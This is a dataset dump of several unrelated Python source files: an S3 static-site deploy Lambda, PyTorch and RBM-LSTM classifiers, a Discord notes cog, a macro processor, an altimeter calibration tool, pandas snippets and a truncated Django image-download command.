compression_opts=4)\nf.close()\n","sub_path":"fkp.py","file_name":"fkp.py","file_ext":"py","file_size_in_byte":8041,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"500238842","text":"# Invoked by: CloudFormation\n# Returns: A `Data` object to a pre-signed URL\n#\n# Deploys the contents of a versioned zip file object from one bucket in S3\n# to a another bucket\n\nimport boto3\nfrom botocore.client import Config\nimport io\nimport zipfile\nimport os\nimport urllib.request\nimport json\nimport traceback\nimport mimetypes\nimport re\n\ns3 = boto3.client(\"s3\", config=Config(signature_version=\"s3v4\"))\n\nSTATUS_SUCCESS = \"SUCCESS\"\nSTATUS_FAILED = \"FAILED\"\n\nmimetypes.init()\nmimetypes.add_type(\"application/json\", \"json\")\nmimetypes.add_type(\"application/ttf\", \"ttf\")\nmimetypes.add_type(\"application/eot\", \"eot\")\nmimetypes.add_type(\"application/otf\", \"otf\")\nmimetypes.add_type(\"application/woff\", \"woff\")\n\n\ndef send_response(event, context, res_status, res_reason=\"Done\", res_data={}):\n print(f\"Sending {res_status} response\")\n\n res_data = json.dumps(\n {\n \"Status\": res_status,\n \"Reason\": res_reason,\n \"PhysicalResourceId\": context.log_stream_name,\n \"StackId\": event[\"StackId\"],\n \"RequestId\": event[\"RequestId\"],\n \"LogicalResourceId\": event[\"LogicalResourceId\"],\n \"Data\": res_data,\n }\n ).encode()\n\n headers = {\"content-type\": \"\"}\n\n url = event[\"ResponseURL\"]\n req = urllib.request.Request(url, data=res_data, method=\"PUT\", headers=headers)\n urllib.request.urlopen(req)\n\n print(\"Response sent\")\n\n\ndef lambda_handler(event, context):\n try:\n print(event)\n\n if event[\"RequestType\"] == \"Create\" or event[\"RequestType\"] == \"Update\":\n # The location of the built static site archive file in S3\n bucket = event[\"ResourceProperties\"][\"StaticSiteArchiveS3Bucket\"]\n key = event[\"ResourceProperties\"][\"StaticSiteArchiveS3Object\"]\n version = event[\"ResourceProperties\"][\"StaticSiteArchiveS3ObjectVersion\"]\n\n # Get the archive object\n s3_obj = s3.get_object(Bucket=bucket, Key=key, VersionId=version)\n\n unzip_dir = f\"/tmp/unzip-{event['RequestId']}\"\n\n # Unzip the archive, to disk\n with zipfile.ZipFile(io.BytesIO(s3_obj[\"Body\"].read()), \"r\") as zip:\n zip.extractall(unzip_dir)\n\n # The bucket to deploy the static to\n deploy_bucket = event[\"ResourceProperties\"][\"StaticSiteS3DeployBucket\"]\n\n # Upload everything from the unzipped archive\n for root, dirs, files in os.walk(unzip_dir):\n for filename in files:\n\n local_path = os.path.join(root, filename)\n s3_key = os.path.relpath(local_path, unzip_dir)\n\n print(f\"Uploading {s3_key} to {deploy_bucket}\")\n mime_type = (\n mimetypes.guess_type(filename)[0] or \"application/octet-stream\"\n )\n extras = {\"ContentType\": mime_type}\n if re.search(r\"\\.html$\", filename):\n extras[\"CacheControl\"] = \"max-age=300\"\n s3.upload_file(local_path, deploy_bucket, s3_key, ExtraArgs=extras)\n\n send_response(event, context, STATUS_SUCCESS)\n else:\n send_response(event, context, STATUS_SUCCESS)\n\n except Exception as e:\n print(\"Function failed due to exception.\")\n print(e)\n traceback.print_exc()\n send_response(event, context, STATUS_FAILED, res_reason=str(e))\n","sub_path":"utility/lambdas/s3-static-site-deploy/lambda_function.py","file_name":"lambda_function.py","file_ext":"py","file_size_in_byte":3434,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"617984082","text":"from __future__ import print_function\nimport argparse\nimport torch\nimport torch.nn as nn\nimport torch.nn.functional as F\nimport torch.optim as optim\nfrom torchvision.transforms import RandomCrop, Resize, Compose, ToTensor\nfrom torchvision import datasets, transforms\nimport matplotlib as plt\n\n# Training settings\nbatch_size = 64\n\ndevice = torch.device(\"cuda:0\" if torch.cuda.is_available() else \"cpu\")\nprint('runing device : {}'.format(device))\n\ntrans = Compose([Resize([512,512]), ToTensor()])\ntrain_dataset = datasets.ImageFolder(root='../dataset/train/', transform = trans)\nval_dataset = datasets.ImageFolder(root='../dataset/val/', transform = trans)\n\n# Data Loader (Input Pipeline)\ntrain_loader = torch.utils.data.DataLoader(dataset=train_dataset,\n batch_size=batch_size,\n shuffle=True)\n\nval_loader = torch.utils.data.DataLoader(dataset=val_dataset,\n batch_size=batch_size,\n shuffle=False)\n\n\nclass Net(nn.Module):\n\n def __init__(self):\n super(Net, self).__init__()\n self.conv1 = nn.Conv2d(3, 64, kernel_size=5, stride= 2, padding =2)\n self.conv2 = nn.Conv2d(64, 128, kernel_size=5)\n self.conv3 = nn.Conv2d(128, 128, kernel_size=3)\n self.mp = nn.MaxPool2d(2)\n self.fc1 = nn.Linear(128*30*30, 2048)\n self.fc2 = nn.Linear(2048, 4)\n\n def forward(self, x):\n in_size = x.size(0)\n x = F.relu(self.mp(self.conv1(x))) #(64,128,128)\n x = F.relu(self.mp(self.conv2(x))) #(128, 62, 62)\n x = F.relu(self.mp(self.conv3(x))) #(128, 30, 30)\n x = x.view(in_size, -1) # flatten the tensor\n x = self.fc1(x)\n x = self.fc2(x)\n return F.log_softmax(x)\n\ndef weight_init(m):\n if isinstance(m, torch.nn.Conv2d) or isinstance(m, torch.nn.Linear):\n torch.nn.init.xavier_uniform_(m.weight)\n\n\ndef plotdata(trl, tel, tea):\n xlist = range(len(trl))\n ax1 = plt.subplot(2, 1, 1)\n plt.plot(xlist, trl, 'r-', label='train loss')\n plt.plot(xlist, tel, 'b-', label='validation loss')\n plt.ylabel('loss value')\n plt.title('loss graph')\n plt.legend(loc=1)\n\n ax2 = plt.subplot(2, 1, 2)\n plt.plot(xlist, tea, 'b-', label='validation acc')\n #plt.ylim(0, 100)\n #plt.xlim(0, 100)\n plt.yticks(range(0,101,10))\n plt.grid(True)\n plt.ylabel('acc(%)')\n plt.title('acc graph')\n plt.legend(loc=1)\n\n plt.tight_layout()\n\n plt.savefig('batchNorWithxavier.png', dpi=300)\n plt.close()\n\nmodel = Net()\nmodel.apply(weight_init)\nmodel.to(device)\n\noptimizer = optim.Adam(model.parameters(), lr=0.0005)\n\ntrloss, teloss, teacc = [], [], []\n\ndef train(epoch):\n model.train()\n for batch_idx, (data, target) in enumerate(train_loader):\n data = data.to(device)\n target = target.to(device)\n optimizer.zero_grad()\n output = model(data)\n loss = F.nll_loss(output, target)\n loss.backward()\n optimizer.step()\n if batch_idx % 10 == 0:\n print('Train Epoch: {} [{}/{} ({:.0f}%)]\\tLoss: {:.6f}'.format(\n epoch, batch_idx * len(data), len(train_loader.dataset),\n 100. * batch_idx / len(train_loader), loss.data[0]))\n trloss.append(loss.item())\n acc = test()\n plotdata(trloss, teloss, teacc)\n return acc\n\ndef test():\n model.eval()\n test_loss = 0\n correct = 0\n for data, target in val_loader:\n data = data.to(device)\n target = target.to(device)\n output = model(data)\n # sum up batch loss\n test_loss += F.nll_loss(output, target, size_average=False).data[0]\n # get the index of the max log-probability\n pred = output.data.max(1, keepdim=True)[1]\n correct += pred.eq(target.data.view_as(pred)).cpu().sum()\n\n test_loss /= len(val_loader.dataset)\n print('\\nTest set: Average loss: {:.4f}, Accuracy: {}/{} ({:.0f}%)\\n'.format(\n test_loss, correct, len(val_loader.dataset),\n 100. * correct / len(val_loader.dataset)))\n teloss.append(test_loss)\n teacc.append(100. * correct / len(val_loader.dataset))\n return correct\n\n\ndef save_checkpoint(state, filename='model_adam.pth.tar'):\n torch.save(state, filename)\n\n\nacc_ = 0\nfor epoch in range(1, 201):\n accurancy = train(epoch)\n if acc_ < accurancy:\n acc_ = accurancy\n ep = epoch\nsave_checkpoint(ep)\nprint('model saved at %d epoch'%ep)\n","sub_path":"sangkyu/CNN.py","file_name":"CNN.py","file_ext":"py","file_size_in_byte":4506,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"479188120","text":"import EGraphics as eg\nfrom EGraphics import color as col\n\nwin = eg.create_window()\n\nx = -25\nwhile True:\n eg.fill(win, col.white)\n eg.draw_circle(win, col.black, 275, 275, 25)\n eg.draw_circle(win, col.red, 250, 250, 25, transparent=150)\n eg.draw_rectangle(win, col.green, x, 250, 50, 50, transparent=150)\n eg.draw_rectangle(win, col.blue, 250, x, 50, 50, transparent=150)\n\n x += 0.05\n if x > 525:\n x = -25\n eg.update()","sub_path":"transparenci_testEG.py","file_name":"transparenci_testEG.py","file_ext":"py","file_size_in_byte":449,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"246836267","text":"import json\n\nimport discord\nfrom discord.ext import commands\nfrom sqlalchemy import func\nfrom sqlalchemy.orm import aliased\nfrom src.util.exceptions import MissingRequiredParameter\nfrom src.model.chapter import Chapter\nfrom src.model.message import Message\nfrom src.model.project import Project\nfrom src.model.staff import Staff\nfrom src.util import exceptions\nfrom src.util.search import searchproject, searchstaff, fakesearch\nfrom src.util.misc import FakeUser, formatNumber, make_mentionable, toggle_mentionable, strx\n\nwith open('src/util/help.json', 'r') as f:\n jsonhelp = json.load(f)\n\n\nclass Note(commands.Cog):\n\n def __init__(self, bot):\n self.bot = bot\n\n\n async def cog_check(self, ctx):\n worker = ctx.guild.get_role(self.bot.config[\"neko_workers\"])\n ia = worker in ctx.message.author.roles\n ic = ctx.channel.id == self.bot.config[\"command_channel\"]\n guild = ctx.guild is not None\n if ia and ic and guild:\n return True\n elif ic:\n raise exceptions.MissingRequiredPermission(\"Missing permission `Neko Worker`.\")\n elif not guild:\n raise exceptions.MissingRequiredPermission(\"Missing permission `Server Member`.\")\n\n\n @commands.command(aliases=[\"an\"], description=jsonhelp[\"addnote\"][\"description\"],\n usage=jsonhelp[\"addnote\"][\"usage\"], brief=jsonhelp[\"addnote\"][\"brief\"], help=jsonhelp[\"addnote\"][\"help\"])\n async def addnote(self, ctx, *, arg):\n session = self.bot.Session()\n try:\n arg = arg[1:]\n d = dict(x.split('=', 1) for x in arg.split(' -'))\n if \"p\" in d and \"c\" in d and \"note\" in d:\n query = session.query(Chapter)\n proj = searchproject(d[\"p\"], session)\n record = query.filter(Chapter.project_id == proj.id).filter(Chapter.number == int(d[\"c\"])).one()\n record.notes = strx(record.notes)+(\"{}\\n\".format(d[\"note\"]))\n await ctx.message.add_reaction(\"👍\")\n session.commit()\n finally:\n session.close()\n\n\n @commands.command(aliases=[\"n\", \"notes\"],description=jsonhelp[\"note\"][\"description\"],\n usage=jsonhelp[\"note\"][\"usage\"], brief=jsonhelp[\"note\"][\"brief\"], help=jsonhelp[\"note\"][\"help\"])\n async def note(self, ctx, *, arg):\n session = self.bot.Session()\n try:\n arg = arg[1:]\n d = dict(x.split('=', 1) for x in arg.split(' -'))\n proj = searchproject(d[\"p\"], session)\n note = session.query(Chapter).filter(proj.id == Chapter.project_id).filter(Chapter.number == int(d[\"c\"])).one()\n await ctx.send(note.notes)\n finally:\n session.close()\n\ndef setup(Bot):\n Bot.add_cog(Note(Bot))","sub_path":"src/cogs/note.py","file_name":"note.py","file_ext":"py","file_size_in_byte":2781,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"207565355","text":"w=open('one.txt','r').read()\r\nq=g=w.splitlines()\r\nname=[]\r\npara=[]\r\nfunc=[]\r\nvar={}\r\nfor line in g:\r\n if '#define' in line:\r\n if '(' in line:\r\n g=line.replace('#define','').replace(' ','').replace(';','')\r\n name.append(g[:g.find('(')])\r\n func.append(g[g.find('{')+1:g.find('}')])\r\n para.append(dict([(x,'') for x in g[g.find('(')+1:g.find(')')].replace(' ','').split(',')]))\r\n else:\r\n g=line.replace('#define','').replace(';','').split()\r\n var.update({g[0]:g[1]})\r\n else:\r\n fn=line[:line.find('(')]\r\n if fn in name:\r\n for v1,v2 in zip(para[name.index(fn)],line[line.find('(')+1:line.find(')')].replace(' ','').split(',')):\r\n para[name.index(fn)][v1]=v2\r\n for word in func[name.index(fn)]:\r\n if word in para[name.index(fn)]:\r\n func[name.index(fn)]=func[name.index(fn)].replace(word,para[name.index(fn)][word])\r\nfor line in q:\r\n if '#define' in line:\r\n continue\r\n else:\r\n if line[:line.find('(')] in name:\r\n print(func[name.index(line[:line.find('(')])])\r\n else:\r\n for val in var:\r\n line=line.replace(val,var[var])\r\n print(line)\r\n \r\n \r\n \r\n \r\n","sub_path":"EX 6/python code/macroprocessor.py","file_name":"macroprocessor.py","file_ext":"py","file_size_in_byte":1342,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"169458565","text":"'''\nTrain/test in MNIST\n'''\nimport torch\nimport torchvision\nimport torchvision.transforms as transforms\nimport RBM\nimport torch.nn as nn\nclass RBMLSTMModel(nn.Module):\n def __init__(self, ninput, n_rbm_unit, nhid, nlayers, noutput, dropout=0.25, RBM_weights = []):\n super(RBMLSTMModel, self).__init__()\n self.drop = nn.Dropout(dropout)\n self.encoder = nn.Linear(ninput*ninput, ninput * n_rbm_unit)\n self.rnn = nn.LSTM(n_rbm_unit, nhid, nlayers, dropout=dropout, batch_first=True)\n self.decoder = nn.Linear(nhid, noutput)\n\n self.ninput = ninput\n self.n_rbm_unit = n_rbm_unit\n self.nlayers = nlayers\n self.nhid = nhid\n\n self.init_weights(RBM_weights)\n\n def init_weights(self,RBM_weights):\n initrange = 0.1\n self.decoder.bias.data.zero_()\n self.decoder.weight.data.uniform_(-initrange, initrange)\n if RBM_weights == []: # 1. default param init\n self.encoder.weight.data.uniform_(-initrange, initrange)\n self.encoder.bias.data.zero_()\n else: # 2. init param with RBM weights!\n self.encoder.weight.data = RBM_weights[0]\n self.encoder.bias.data = RBM_weights[1]\n\n def forward(self, input, hidden):\n z = self.encoder(input.reshape(-1, self.ninput * self.n_rbm_unit))\n z = z.reshape(-1, self.ninput, self.n_rbm_unit)\n output, hidden = self.rnn(z, hidden)\n output = self.drop(output)\n decoded = self.decoder(output)\n return decoded\n\n def init_hidden(self, bsz, cuda_flag = False):\n weight = next(self.parameters())\n if cuda_flag == False:\n return (weight.new_zeros(self.nlayers, bsz, self.nhid),\n weight.new_zeros(self.nlayers, bsz, self.nhid))\n return (weight.new_zeros(self.nlayers, bsz, self.nhid).cuda(),\n weight.new_zeros(self.nlayers, bsz, self.nhid).cuda())\n\ndef train(model,trainloader,optimizer,device,criterion):\n for i, data in enumerate(trainloader, 0): # get the inputs; data is a list of [inputs, labels]\n images, labels = data\n temp_shape = images.shape\n images = images.reshape([temp_shape[0], temp_shape[2], temp_shape[3]])\n images = images.to(device)\n labels = labels.to(device)\n hidden = model.init_hidden(temp_shape[0], cuda_flag=True)\n model.to(device)\n\n model.zero_grad()\n output = model(images, hidden)\n loss = criterion(output[:, -1, :], labels)\n loss.backward()\n optimizer.step()\n\n print('loss:', loss.item())\n\ndef test(model,testloader,device,classes):\n class_correct = list(0. for i in range(10))\n class_total = list(0. for i in range(10))\n with torch.no_grad():\n for data in testloader:\n images, labels = data\n temp_shape = images.shape\n hidden = model.init_hidden(temp_shape[0], cuda_flag=True)\n images = images.reshape([temp_shape[0], temp_shape[2], temp_shape[3]])\n images = images.to(device)\n labels = labels.to(device)\n model.to(device)\n outputs = model(images, hidden)\n _, predicted = torch.max(outputs[:, -1, :], 1)\n c = (predicted == labels).squeeze()\n for i in range(4):\n label = labels[i]\n class_correct[label] += c[i].item()\n class_total[label] += 1\n sum_acc = 0\n eps = 0.00000001\n for i in range(10):\n print('Accuracy of %3s : %2d %%' % (\n classes[i], 100 * class_correct[i] / (class_total[i] + eps)))\n sum_acc += class_correct[i] / (class_total[i] + eps) * 100\n\n print('Accuracy of all: %.2f %%' % (sum_acc / 10))\n\ndef main():\n # train on the GPU or on the CPU, if a GPU is not available\n batch_size = 64\n transform = transforms.Compose(\n [transforms.ToTensor(),\n transforms.Normalize((0.1307,), (0.3081,))])\n device = torch.device('cuda') if torch.cuda.is_available() else torch.device('cpu')\n\n # get MNIST data, and shuffle them\n trainset = torchvision.datasets.MNIST(root='./data', train=True, download=True, transform=transform)\n indices = torch.randperm(len(trainset)).tolist()\n trainset = torch.utils.data.Subset(trainset, indices[:3000])\n\n testset = torchvision.datasets.MNIST(root='./data', train=False, download=True, transform=transform)\n indices = torch.randperm(len(testset)).tolist()\n testset = torch.utils.data.Subset(testset, indices[:])\n\n trainloader = torch.utils.data.DataLoader(trainset, batch_size=batch_size, shuffle=True, num_workers=2)\n testloader = torch.utils.data.DataLoader(testset, batch_size=batch_size, shuffle=False, num_workers=2)\n\n classes = ('0', '1', '2', '3', '4', '5', '6', '7', '8', '9')\n\n # we will use RBM trained weights to init first encoder layer\n #rbm = RBM.RBM().to(device)\n #RBM_weights = rbm.RBMtrain(trainloader, numdims=28*28, numhid=28*28, maxepoch=2)\n\n model = RBMLSTMModel(\n noutput=10,\n ninput=28,\n n_rbm_unit=28,\n nhid=64,\n nlayers=1,\n RBM_weights=[]\n )\n\n # construct an optimizer\n params = [p for p in model.parameters() if p.requires_grad]\n criterion = nn.CrossEntropyLoss()\n optimizer = torch.optim.SGD(params, lr=0.005,\n momentum=0.9, weight_decay=0.0005)\n\n n_epoch = 20\n for iter in range(n_epoch):\n train(model,trainloader,optimizer,device,criterion)\n\n torch.save(model.state_dict(), 'lastParams')\n model.load_state_dict(torch.load('lastParams'))\n\n model.eval()\n test(model,testloader,device,classes)\n\nif __name__ == \"__main__\":\n main()","sub_path":"RBMs-LSTM.py","file_name":"RBMs-LSTM.py","file_ext":"py","file_size_in_byte":5688,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"473705151","text":"\"\"\" produce\n\nThis program is to calibrate the BSR AltAcc and save results to a file\n\"\"\"\n\nimport math\nimport argparse\nimport logging\nfrom prodata import *\n\nVERSION = \"1.25c\"\nPORT = \"/dev/ttyUSB0\"\nBAUD = 9600\nTICK_CHAR = '.'\n\nData = namedtuple('Data', \"n, sum_ squares\")\nSamples = namedtuple('Samples', \"acc pre\")\n\n\ndef parse_commandline():\n global args, parser\n\n parser = argparse.ArgumentParser(prog='probate', description=f'AltAcc calibration program (v{VERSION})')\n parser.add_argument('-p', '--port', help='serial/com port')\n parser.add_argument('-n', '--nit', default=NIT_NAME, help='override init filename')\n parser.add_argument('-o', '--out', help='output calibration filename')\n\n parser.add_argument('-q', '--quiet', action='store_true', help=\"be quiet about it\")\n parser.add_argument('--version', action='version', version=f'v{VERSION}')\n parser.add_argument('calfile', default=None, nargs='?', action='store',\n help='output calibration filename (same as --out)')\n\n args = parser.parse_args()\n\n\ndef set_port(port):\n if port == 'MOCK':\n class SerMock:\n name = port\n \n def write(self, data):\n pass\n \n def read(self, count):\n return b'125 236\\n'\n\n return SerMock() \n else:\n import serial\n com = serial.Serial(port=port, baudrate=BAUD)\n if not com:\n print(\"could not open\", port)\n sys.exit(1)\n\n return com\n\n\ndef get_samples(com):\n # discard any noise on the line\n com.reset_input_buffer()\n com.reset_output_buffer()\n\n com.write(b'/T')\n\n samples = []\n for i in range(256):\n line = com.read(8)\n if len(line) < 8:\n break\n\n # Due to the LED sharing the serial line check for and discard noise\n if b'\\x00' in line:\n # attempt to sync with the end of line\n while True:\n c = com.read(1)\n if c == b'\\n':\n break\n continue\n\n a, p = [int(x) for x in line.strip().split()]\n \n samples.append(Samples._make((a, p)))\n \n if i % 8 == 0:\n print(TICK_CHAR, end='')\n sys.stdout.flush()\n print()\n\n return samples\n\n\ndef get_data(com, what):\n while True:\n data = get_samples(com)\n\n print(f\"received {len(data)} of 256 samples from the AltAcc on {com.name}\")\n\n s = input(\"accept AltAcc data? ( y-yes | n-no | x-exit ) \")\n\n if s in ('x', 'X'):\n sys.exit(3)\n\n if s not in ('n', 'N'): # i.e.default answer == 'y'\n break\n\n count = len(data)\n sum_ = 0.0\n squares = 0.0\n\n for i in range(count):\n dtemp = data[i].pre if what == 'pre' else data[i].acc\n sum_ += dtemp\n squares += dtemp * dtemp\n\n return Data._make((count, sum_, squares))\n\n\ndef main():\n\n parse_commandline()\n print()\n print(args)\n\n cal_filename = args.calfile or args.out\n if not cal_filename:\n parser.print_help()\n sys.exit(1)\n\n # Create a skeleton cal dict\n cal = {k: None for k in cal_info.keys()}\n\n # go read the .nit file -- (v2) -- Moved here so CalFile, et al are set\n nit = read_nitfile(args.nit)\n print(nit)\n\n # Open the com port\n port = args.port or nit['port'] or PORT\n com = set_port(port)\n\n print(f\"gathering calibration data from the AltAcc on {port}\")\n\n s = input(\"\\nEnter the absolute Barometric Pressure ( x to exit ) \")\n if s.strip() in ('x', 'X'):\n sys.exit(3)\n\n cal['ActBP'] = float(s)\n\n s = input(\"\\nEnter the actual altitude ( x to exit ) \")\n if s.strip() in ('x', 'X'):\n sys.exit(3)\n\n cal['ActAlt'] = float(s)\n\n # get_load (1, 0)\n pre = get_data(com, \"pre\")\n\n cal['AvgBP'] = pre.sum_ / pre.n\n cal['StDBP'] = math.sqrt((pre.squares - (pre.sum_ * pre.sum_ / pre.n)) / (pre.n - 1))\n\n # Work out offset\n cal['OffBP'] = calc_offset(cal['ActBP'], cal['AvgBP'])\n\n dump_calfile(None, cal)\n\n # Accelerometer calibration\n print(\"\\nSet the AltAcc Upside Down to Measure -1 G\")\n input(\"then press enter when ready ( x to quit ) \")\n if s.strip() in ('x', 'X'):\n sys.exit(3)\n\n # get_load (0, 1)\n neg = get_data(com, \"acc\")\n\n cal['AvgNegG'] = neg.sum_ / neg.n\n cal['StDNegG'] = math.sqrt((neg.squares - (neg.sum_ * neg.sum_ / neg.n)) / (neg.n - 1))\n\n print(\"\\nSet the AltAcc Flat to Measure Zero G\")\n input(\"then press enter when ready ( x to quit ) \")\n if s.strip() in ('x', 'X'):\n sys.exit(3)\n\n # GetaLoadaData(0, 2);\n zero = get_data(com, \"acc\")\n\n cal['AvgZeroG'] = zero.sum_ / zero.n\n cal['StDZeroG'] = math.sqrt((zero.squares - (zero.sum_ * zero.sum_ / zero.n)) / (zero.n - 1))\n\n cal['FiDNegG'] = cal['AvgZeroG'] - cal['AvgNegG']\n\n print(\"\\nSet the AltAcc Right side Up to Measure Plus One G\")\n input(\"then press enter when ready ( x to quit ) \")\n\n # GetaLoadaData(0, 3);\n one = get_data(com, \"acc\")\n\n cal['AvgOneG'] = one.sum_ / one.n\n cal['StDOneG'] = math.sqrt((one.squares - (one.sum_ * one.sum_ / one.n)) / (one.n - 1))\n\n cal['FiDZeroG'] = cal['AvgOneG'] - cal['AvgZeroG']\n\n # calculate slope. Least Squares is simplified with X = { -1,0,+1 }\n cal['Slope'] = (one.sum_ - neg.sum_) / (one.n + neg.n)\n\n # Y-Intercept is the Avg G Value:\n cal['YZero'] = (one.sum_ + zero.sum_ + neg.sum_) / (one.n + zero.n + neg.n)\n\n # Correlation Coefficient = 1 - std^2_y_x / std_y^2\n\n # Estimate Output at G = -1, do sum of diff squared\n dtemp = cal['AvgNegG'] - (-1 * cal['Slope'] + cal['YZero'])\n std_y_x = neg.sum_ * neg.sum_ * dtemp * dtemp\n\n # Estimate Output at G = 0\n dtemp = cal['AvgZeroG'] - cal['YZero']\n std_y_x += (zero.sum_ * zero.sum_ * dtemp * dtemp)\n\n # Estimate Output at G = 1\n dtemp = cal['AvgOneG'] - (cal['Slope'] + cal['YZero'])\n std_y_x = one.sum_ * one.sum_ * dtemp * dtemp\n\n dtemp = one.sum_ + zero.sum_ + neg.sum_\n n = one.n + zero.n + neg.n\n\n std_y_x /= n - 2\n\n std_y = ((one.squares + zero.squares + neg.squares) - ((dtemp * dtemp) / n)) / (n - 1)\n if std_y > 0:\n cal['CCoff'] = 1.0 - (std_y_x / std_y)\n\n # Test for proper operation and a good unit\n if cal['FiDNegG'] <= 0.0 or cal['FiDZeroG'] <= 0.0:\n print(\"\\n*** Warning *** Average Values indicate calibration error\")\n s = input(\" or a defective unit. Save data? ( y | n ) \")\n if s in ('y', 'Y'):\n sys.exit(3)\n \n dump_calfile(cal_filename, cal)\n\n if not args.quiet:\n dump_calfile(None, cal)\n\n\nif \"win\" not in sys.platform:\n # For Pythonsita bug in debug\n sys.argv = ['probate.py', 'pb.cal']\n\nmain()\n","sub_path":"probate.py","file_name":"probate.py","file_ext":"py","file_size_in_byte":6788,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"220459012","text":"#apply sort_values \n\nfrom scipy.spatial import distance\n\n# Fill in NA values in nba_normalized\nnba_normalized.fillna(0, inplace=True)\n\n# Find the normalized vector for lebron james.\nlebron_normalized = nba_normalized[nba[\"player\"] == \"LeBron James\"]\n\n# Find the distance between lebron james and everyone else.\neuclidean_distances = nba_normalized.apply(lambda row: distance.euclidean(row, lebron_normalized), axis=1)\n\nsorted_distance = euclidean_distances.sort_values()\nresult_index = sorted_distance.index[1]\nmost_similar_to_lebron = nba.loc[result_index,\"player\"]\n\n\n#pivot_table\nimport numpy as np\n\n# This will compute the mean survival chance and the mean age for each passenger class\npassenger_survival = titanic_survival.pivot_table(index=\"pclass\", values=[\"age\", \"survived\"], aggfunc=np.mean)\nprint(passenger_survival)\n\nport_stats = titanic_survival.pivot_table(index=\"embarked\",values=[\"age\",\"survived\",\"fare\"],aggfunc = np.mean)\n\n\n\n#value_counts Returns object containing counts of unique values\n#使用value_counts 得到一列去重复的索引及其数量的多少 然后再用 index 得到去重的索引\nimport numpy as np\nprint(all_ages['Major_category'].value_counts().index)\n\nrecent_grads = pd.read_csv(\"recent-grads.csv\")\n\nall_ages_major_categories = dict()\nrecent_grads_major_categories = dict()\nall_ages_major_categories = all_ages.pivot_table(index=\"Major_category\",values=\"Total\",aggfunc = np.sum).to_dict()\nrecent_grads_major_categories = recent_grads.pivot_table(index=\"Major_category\",values=\"Total\",aggfunc = np.sum).to_dict()\n\n\"\"\"\nEngineering 29\nEducation 16\nHumanities & Liberal Arts 15\nBiology & Life Science 14\nBusiness 13\nHealth 12\nComputers & Mathematics 11\nAgriculture & Natural Resources 10\nPhysical Sciences 10\nSocial Science 9\nPsychology & Social Work 9\nArts 8\nIndustrial Arts & Consumer Services 7\nLaw & Public Policy 5\nCommunications & Journalism 4\nInterdisciplinary 1\nName: Major_category, dtype: int64\n\"\"\"\n\n\n\n\n#to_list() reindex()\n#The reindex() method allows you to specify an alternate ordering of the labels (index) \n#for a Series object. This method takes in a list of strings corresponding to the order of labels you'd like for that Series object\noriginal_index = series_custom.index.tolist()\nsorted_index = sorted(original_index)\nsorted_by_index = series_custom.reindex(sorted_index)\n\n# reset_index\n# 使用 dropna 后,index 改变 用 reset_index 恢复从0开始的顺序 \ntitanic_reindexed = titanic_survival.dropna(subset=[\"age\",\"boat\"]).reset_index(drop=True)\n\n# set_index \n#Use the Pandas DataFrame method set_index to assign the FILM column as the custom index \n#for the DataFrame without the FILM column dropped from the \nfandango = pd.read_csv('fandango_score_comparison.csv')\nfandango_films = fandango.set_index(fandango[\"FILM\"].values,inplace = False,drop=False)\nprint(fandango_films.index)\n\n\n\n\n\n\n#dtype\n\n# returns the data types as a Series\ntypes = fandango_films.dtypes\n# filter data types to just floats, index attributes returns just column names\nfloat_columns = types[types.values == 'float64'].index\n# use bracket notation to filter columns to just float columns\nfloat_df = fandango_films[float_columns]\n\n# `x` is a Series object representing a column\ndeviations = float_df.apply(lambda x: np.std(x))\n\nprint(deviations)\n\n\n#sort by index and by values\nsc2 = series_custom.sort_index()\nsc3 = series_custom.sort_values()\nprint(sc2.iloc[0])\nprint(sc3.iloc[0])\n\n\n#iloc\nfirst_last = fandango.iloc[[0,-1]]\nprint(first_last)\n\n\n\n\n#to_numeric\ncols = ['AP Test Takers ', 'Total Exams Taken', 'Number of Exams with scores 3 4 or 5']\n\nfor col in cols:\n data[\"ap_2010\"][col] = pandas.to_numeric(data[\"ap_2010\"][col], errors=\"coerce\")\n \nprint(data[\"ap_2010\"].head())\n","sub_path":"little_skill.py","file_name":"little_skill.py","file_ext":"py","file_size_in_byte":4055,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"560449189","text":"def inverte_dicionario(d):\n dnovo = {}\n for i in d.values():\n if i not in dnovo.keys():\n lista = []\n for j in d.keys():\n if d[j] == i:\n lista.append(j)\n dnovo[i] = lista\n return dnovo\n ","sub_path":"backup/user_059/ch84_2020_05_14_00_55_38_575798.py","file_name":"ch84_2020_05_14_00_55_38_575798.py","file_ext":"py","file_size_in_byte":271,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"636190016","text":"import urllib\nimport os\n\nfrom django.core.files import File\nfrom django.core.files.temp import NamedTemporaryFile\nfrom django.core.management.base import BaseCommand\nfrom django.utils.encoding import smart_text\nfrom PIL import Image, ImageFile\n\nfrom auth.email import render_and_send_mail\nfrom order.models import ListingQueuedImage\nfrom settings import SERVER_EMAIL, MEDIA_ROOT\n\nimport logging\nlogger = logging.getLogger('django.request')\n\nclass Command(BaseCommand):\n def handle(self, *args, **options):\n\n lqis = ListingQueuedImage.objects.filter(processing=False)\n self.stdout.write('Processing download of %s image%s ...\\n' % (\n lqis.count(),\n \"s\" if lqis.count() != 1 else \"\"\n ))\n\n results = {}\n names = {}\n successes = {}\n failures = {}\n\n for lqi in lqis:\n\n # Flag the queued image for processing\n ListingQueuedImage.objects.filter(pk=lqi.pk).update(processing=True)\n\n # Initialize necessities\n v = lqi.listing.vendor\n if v.pk not in results.keys():\n results[v.pk] = {\n 'name' : v.name,\n 'email' : v.email,\n 'successes' : 0,\n 'errors' : []\n }\n\n try:\n file = urllib.urlretrieve(lqi.url)\n filename = (\"%s.jpg\" % (\n \".\".join(\n lqi.url\n .split('?')[0]\n .split('/')[-1]\n .split('.')[0:-1]\n )\n or 